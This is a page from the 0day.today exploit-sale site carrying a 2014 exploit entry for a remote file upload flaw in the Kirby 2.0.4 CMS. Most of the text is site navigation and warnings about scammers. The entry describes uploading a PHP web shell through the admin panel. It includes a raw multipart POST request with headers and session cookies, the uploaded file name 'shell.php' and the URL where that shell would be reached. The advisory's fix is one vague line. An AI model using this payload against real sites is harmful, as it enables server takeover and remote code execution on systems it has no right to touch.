0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kirby 2.0.4 - Remote File Upload Vulnerability
# Title : Kirby 2.0.4 - Remote File Upload Vulnerability # Name CMS : kirby # Version : 2.0.4 # Author :ZwX # Download : # Date : 04/12/2014 ------------------------------------- Description ------------------------------------- The vulnerability is in the admin panel to be able to upload a shell so you have to log in as administrator. ------------------------------------- Proof Of Concept (PoC) ------------------------------------- # Host: 127.0.0.1 # User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0 # Accept: application/json # Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 # Accept-Encoding: gzip, deflate # Cache-Control: no-cache # X-Requested-With: XMLHttpRequest # : http://127.0.0.1/kirby-2.0.4/panel/ # Content-Length: 110842 # Content-Type: multipart/form-data; boundary=---------------------------28037442317663 # Cookie: PHPSESSID=qo2usiq27qftlslvle8vlauc90; hotlog=1; key=08cb0e14ab0f38272f427a2c7c7863e19703aa1d%2Bd033e22ae348aeb5660fc2140aec35850c4da997%7C1417695505%7C3a0bf33153da65436502fd24d239017742002e59%7CYWRtaW4%3D # Connection: keep-alive # Pragma: no-cache # Method POST : -----------------------------28037442317663\r\n Content-Disposition: form-data; name="file"; filename="shell.php"\r\n Content-Type: application/octet-stream\r\n \r\n # URL : http://127.0.0.1/kirby-2.0.4/content/2-projects/1-project-a/Shell.php ------------------------------------- Solution ------------------------------------- Update the php file upload # 0day.today [2024-06-23] #